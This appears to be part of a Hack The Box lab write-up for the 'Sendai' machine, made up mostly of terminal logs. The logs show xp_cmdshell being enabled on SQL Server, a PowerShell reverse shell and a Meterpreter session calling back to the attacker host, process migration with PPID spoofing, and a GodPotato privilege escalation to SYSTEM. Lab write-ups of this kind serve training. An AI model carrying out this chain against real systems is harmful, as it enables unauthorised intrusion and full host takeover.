SQL (SENDAI\Administrator  dbo@master)> EXEC sp_configure 'xp_cmdshell',1;
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SENDAI\Administrator  dbo@master)> RECONFIGURE;
SQL (SENDAI\Administrator  dbo@master)> EXEC xp_cmdshell 'whoami'
output          
-------------   
sendai\sqlsvc   

NULL            

Get a reverse shell back with PowerShell.

SQL (SENDAI\Administrator  dbo@master)> EXEC xp_cmdshell 'powershell -e ...'

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.16.23] from (UNKNOWN) [10.129.234.66] 57968
whoami
sendai\sqlsvc
PS C:\Windows\system32> 

Upgrade the shell: bring it into msf, and use msf's process migration to make it more stable.

msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://10.10.16.23:4444
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Staging x64 payload (204892 bytes) ...
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] Session ID 1 (10.10.16.23:4444 -> 10.129.234.66:58076) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DC
[*] Current server process: shell.exe (3968)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 5208
[+] Successfully migrated into process 5208
[*] Meterpreter session 1 opened (10.10.16.23:4444 -> 10.129.234.66:58076) at 2025-09-18 09:26:51 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 768 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\users\sqlsvc\Documents>whoami /all
whoami /all

USER INFORMATION
----------------

User Name     SID                                         
============= ============================================
sendai\sqlsvc S-1-5-21-3085872742-570972823-736764132-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                                        Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Pick any potato for privilege escalation, and done.

C:\users\sqlsvc\Documents>.\GodPotato-NET4.exe  -cmd "cmd /c C:\users\sqlsvc\Documents\shell.exe"
.\GodPotato-NET4.exe  -cmd "cmd /c C:\users\sqlsvc\Documents\shell.exe"
[*] CombaseModule: 0x140712362377216
[*] DispatchTable: 0x140712364964168
[*] UseProtseqFunction: 0x140712364257472
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\ee30b0eb-3444-427c-a150-41c7a1bf125d\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002002-0660-ffff-b35f-eef0a3c42949
[*] DCOM obj OXID: 0x535f01d97b4a2461
[*] DCOM obj OID: 0xeb87aa8a01016c28
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x760  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5628
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Staging x64 payload (204892 bytes) ...
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] Session ID 2 (10.10.16.23:4444 -> 10.129.234.66:58176) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DC
[*] Current server process: shell.exe (1896)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2504

C:\users\sqlsvc\Documents>[+] Successfully migrated into process 2504
[*] Meterpreter session 2 opened (10.10.16.23:4444 -> 10.129.234.66:58176) at 2025-09-18 09:32:55 -0400
exity^H
exity
'exit' is not recognized as an internal or external command,
operable program or batch file.

C:\users\sqlsvc\Documents>exit
exit
meterpreter > exit
[*] Shutting down session: 1

[*] 10.129.234.66 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell
Process 2564 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\users\sqlsvc\Documents>whoami
whoami
nt authority\system

The flag is in the Administrator directory; I won't bother pasting it here.